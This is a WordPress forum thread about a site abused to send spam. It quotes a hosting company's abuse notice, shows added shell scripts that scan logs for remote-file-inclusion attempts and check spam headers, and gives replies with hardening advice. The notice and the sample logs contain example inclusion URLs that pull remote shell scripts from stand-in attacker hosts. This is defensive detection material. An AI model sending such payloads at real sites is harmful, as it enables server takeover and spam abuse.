• I have recently set up my personal web site at https://www.fmueller.com, using WordPress as a content management system. Today I received an email from my hosting company 1&1 to inform me that the site has been abused to send large amounts of spam email. Grateful for any advice on how I can stop this hateful practice and secure the site against future abuse.

    Many thanks

    Frank

    PS: Below is the email I received from 1&1. I apologize for the long post.

    _________________________

    Dear Mr Frank Mueller,

    Unfortunately, we have received a large number of complaints concerning spam mails
    sent through your 1&1 Webspace.

    We have to bring to your attention that this kind of mass mailing is illegal
    and can be prosecuted.

    To help you get a general idea of the situation we have divided this e-mail into
    two thematic sections.

    In case you personally send large amounts of E-Mails, especially newsletters,
    please continue reading on section one.

    If you suspect that your Webspace has been compromised, especially through a
    script, by a third party and abused to send Spam-Mails, please continue reading
    on section two.

    *******************************************************************************
    1. E-Mail/Newsletter sent by yourself?
    *******************************************************************************

    If you arrange the sending of the mails in question yourself, please note
    that you have to use a so-called “confirmed opt-in” system for your newsletter
    subscriptions to ensure that e-mails are only sent out to recipients who
    explicitly agreed to receive them.

    When using confirmed opt-in the subscription process looks something like this:
    * Somebody asks for an address to be added to the list of recipients
    * The system sends an E-Mail to that address with a verification link or code
    * Only when that (unique) link is clicked or the code is mailed back is the
    address allowed to be added to the database

    You can find further information for example at:

    https://en.wikipedia.org/wiki/Opt_in_e-mail

    In case of complaints you can prove, by the verification you received, that the
    recipient explicitly agreed to be on your list.

    *******************************************************************************
    2. Webspace compromised by a third party?
    *******************************************************************************

    Quite often the Webspace gets compromised via insecure PHP-Scripts.

    Insecure PHP Scripts with security holes like Cross-site-scripting
    (https://en.wikipedia.org/wiki/Cross_site_scripting) make it possible to
    include for example Mass-Mailing-Scripts and execute them on your Webspace.
    It is very helpful to analyze the Apache log files to detect such attacks.

    The attacks mostly look like the following example:
    https://www.mydomain.com/index.php?page=https://www.attackerdomain.ru/c99.txt?

    Searching the log files for the pattern "=http" would be the first step:

    grep "=http" access.log | less        for the current log file
    and
    zgrep "=http" access.log.* | less     for the older (rotated) log files

    If you detect such entries, we would recommend that you analyze and modify
    the concerning script to prevent further abuse.

    In case of a third party script (for example mambo) check the relevant
    homepage for security updates and patches.

    Furthermore we recommend you to check all your third party scripts for
    security patches or updates.

    In addition a complete search of your Webspace for unknown foreign scripts
    makes sense.

    If you need more information in this case you can request a sample
    SPAM E-mail, which was sent via your Webspace, from us.

    If the SPAM problem persists we recommend a complete deletion of all your files
    on your space and a recovery of your data with a clean backup.

    We hereby ask you to take the corresponding steps required to secure your
    Webspace and to prevent the delivery of unwanted, unsolicited bulk e-mail.

    Should further complaints reach us, we will feel impelled to take
    corresponding steps according to our T&C, which will result in a temporary lock.
    Thank you for your understanding.

    If you have further questions, feel free to contact us.

    Kind Regards.


    1&1 Internet Inc.
    Abuse-Department
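
    The two checks 1&1 recommends above, grepping the Apache access logs for "=http" and searching the webspace for foreign scripts, as a small shell script. This is an added example written for this thread; it is not part of 1&1's email or of WordPress. It handles rotated .gz logs the way the zgrep line does, ignores URL-valued parameters that only point back at your own host (such as a login redirect), and lists PHP files under wp-content/uploads, where WordPress stores only media. All log lines, IPs and the evil.example host are constructed sample data; the c99.txt request is the one shown in the email.

```sh
#!/bin/sh
# Added example for this thread; not part of 1&1's email or of WordPress.
# Implements the two checks the email recommends: grepping Apache access
# logs (plain and rotated .gz) for "=http" query values, and searching the
# webspace for PHP files where none belong. All log lines, hostnames and
# IPs below are constructed sample data.

# Print request lines whose query string carries a URL as a parameter
# value (the remote-file-inclusion pattern), case-insensitively, while
# ignoring values that merely point back at our own host.
#   $1 = log file, plain or gzip-compressed   $2 = our own hostname
find_rfi_attempts() {
    log="$1"; own_host="$2"
    case "$log" in
        *.gz) zcat "$log" ;;
        *)    cat "$log" ;;
    esac | grep -i '=http' | grep -E -v "=https?://$own_host"
}

# Number of distinct client IPs (first field of the combined log format)
# behind those requests: a few noisy sources usually stand out.
count_sources() {
    find_rfi_attempts "$1" "$2" | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}

# PHP files inside wp-content/uploads are almost always foreign: WordPress
# stores only media there, so any .php file in that tree deserves a look.
#   $1 = document root of the WordPress install
find_unexpected_php() {
    find "$1/wp-content/uploads" -type f -name '*.php' | sort
}

# Constructed Apache combined-format sample log, written to $1.
make_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [10/Apr/2007:10:01:12 +0000] "GET /index.php?page=https://www.attackerdomain.ru/c99.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Apr/2007:10:02:45 +0000] "GET /wp-content/plugins/gallery/view.php?inc=http://evil.example/cmd.txt HTTP/1.1" 200 128 "-" "libwww-perl/5.805"
192.0.2.9 - - [10/Apr/2007:10:03:01 +0000] "GET /about/ HTTP/1.1" 200 4096 "https://www.mydomain.com/" "Mozilla/5.0"
192.0.2.10 - - [10/Apr/2007:10:04:11 +0000] "GET /wp-login.php?redirect_to=http://www.mydomain.com/wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2007:10:05:30 +0000] "GET /index.php?page=HTTP://203.0.113.5/cmd.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
EOF
}

# Constructed miniature webspace: one legitimate plugin file, one image
# upload, and one PHP file planted in the uploads tree.
make_sample_webroot() {
    mkdir -p "$1/wp-content/plugins/gallery" "$1/wp-content/uploads/2007/04"
    printf '<?php // plugin code\n'  > "$1/wp-content/plugins/gallery/view.php"
    printf 'not really a jpeg\n'     > "$1/wp-content/uploads/2007/04/photo.jpg"
    printf '<?php // dropped here\n' > "$1/wp-content/uploads/2007/04/mailer.php"
}

# Stand-alone demonstration on the constructed data.
demo_dir=$(mktemp -d)
make_sample_log "$demo_dir/access.log"
make_sample_webroot "$demo_dir/htdocs"
echo "Suspicious requests in access.log:"
find_rfi_attempts "$demo_dir/access.log" www.mydomain.com
echo "Distinct source IPs: $(count_sources "$demo_dir/access.log" www.mydomain.com)"
echo "Unexpected PHP files under uploads:"
find_unexpected_php "$demo_dir/htdocs"
rm -r "$demo_dir"
```

    Run it as-is to see the three suspicious requests, the two source IPs behind them, and the planted mailer.php; against a real install, point find_rfi_attempts at each file in the Apache log directory and find_unexpected_php at the document root. A hit in the log only tells you that someone tried the inclusion; whether it succeeded shows in the status code, the response size, and in whatever turned up under uploads.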

Viewing 2 replies - 1 through 2 (of 2 total)
  • Dear Frank,

    The first thing you do is upgrade your installation of WordPress to the current version.

    You are currently running 2.1.2. You might have missed the announcement in your dashboard that there is a new release out that addresses some security issues. If you did miss it, here is that thread:

    https://www.ads-software.com/development/2007/04/wordpress-213-and-2010/

    Upgrade immediately.

    The next thing to look at after that is whether or not you have any plugins installed that send e-mails: contact forms, especially.

    Do you?

    How about newsletter plugins?

    If you do not, you should know that e-mail headers can be forged, quite easily, and often times are. I would be asking 1&1 if they have confirmed that the e-mails were ACTUALLY sent via your domain or did the headers just make it look like they originated from you.

    There’s a critical distinction that needs to be made:

    Can they verify the traffic from your site through their network?

    Or are they simply getting complaints from folks, and relying on the headers for evidence?

    Once you have upgraded, and if you have NOTHING on your site that might be sending out e-mails, and if they (the e-mails) continue, chances are the headers are being forged.

    Hope that helps,

    whoomai
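
    The distinction whoomai draws above, between a forged From: header and traffic that really left the server, can be checked from a sample spam message like the one 1&1 offers to send. The script below is an added example, not part of this thread: it pulls the bracketed IP out of every Received: header, treats the last one (the earliest hop) as the origin, and compares it with the web server's IP. Both messages, the 192.0.2.50 server address and the relay names are constructed. One caveat: a spammer can prepend fake Received: lines of their own, so only the hops down to the first relay the complainant trusts are meaningful.

```sh
#!/bin/sh
# Added example, not part of the forum thread: checks whether a spam
# sample's Received: chain actually starts at the web server, or whether
# only the From: header claims so. All addresses below are constructed.

# Print the IP in each Received: header, in header order (newest hop first).
received_ips() {
    sed -n 's/^Received: .*\[\([0-9.][0-9.]*\)\].*/\1/p' "$1"
}

# Earliest hop, i.e. the last Received: header in the message.
origin_ip() {
    received_ips "$1" | tail -n 1
}

# Succeed (exit 0) only if the earliest hop is the given server IP.
originated_from() {
    ip=$(origin_ip "$1")
    [ -n "$ip" ] && [ "$ip" = "$2" ]
}

# Constructed spam sample: From: claims the site, but the chain ends at an
# unrelated host, i.e. the headers were forged and the webspace never sent it.
make_forged_sample() {
    cat > "$1" <<'EOF'
Received: from relay.isp.example (relay.isp.example [198.51.100.20])
    by mx.recipient.example with ESMTP; Tue, 10 Apr 2007 10:07:00 +0000
Received: from dialup-42.example.net (dialup-42.example.net [203.0.113.42])
    by relay.isp.example with SMTP; Tue, 10 Apr 2007 10:06:58 +0000
From: "Frank" <frank@mydomain.com>
To: victim@recipient.example
Subject: constructed sample

body
EOF
}

# Constructed sample that really left the web server (192.0.2.50).
make_genuine_sample() {
    cat > "$1" <<'EOF'
Received: from relay.isp.example (relay.isp.example [198.51.100.20])
    by mx.recipient.example with ESMTP; Tue, 10 Apr 2007 10:07:00 +0000
Received: from www.mydomain.com (www.mydomain.com [192.0.2.50])
    by relay.isp.example with ESMTP; Tue, 10 Apr 2007 10:06:58 +0000
From: "Frank" <frank@mydomain.com>
To: victim@recipient.example
Subject: constructed sample

body
EOF
}

# Stand-alone demonstration on the two constructed messages.
demo=$(mktemp -d)
make_forged_sample "$demo/forged.eml"
make_genuine_sample "$demo/genuine.eml"
for m in forged genuine; do
    if originated_from "$demo/$m.eml" 192.0.2.50; then
        echo "$m.eml: earliest hop is the web server, so the mail really left it"
    else
        echo "$m.eml: earliest hop is $(origin_ip "$demo/$m.eml"), not the web server; headers likely forged"
    fi
done
rm -r "$demo"
```

    If the earliest hop is the server, the hosting company's complaint is about real traffic and the log and file checks from the 1&1 email are the next step; if it is some unrelated address, the site is being impersonated and no amount of cleaning the webspace will stop it.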

  • (1) Don’t state your e-mail address on your website. If you are going to have somebody contact you, use a PHP form.

    (2) It is not necessary, however, to designate a disposable e-mail account under Options/General. That’s because a comment spammer doesn’t use his/her own e-mail account to register an account.

    (3) Be careful with single-line comments like ‘Hi.’ and ‘Thank you.’ Comment spammers often leave those simple comments to test your blog and see your security measures.

    Good luck

    Tom Bluewater

  • The topic ‘My web site abused for spam email’ is closed to new replies.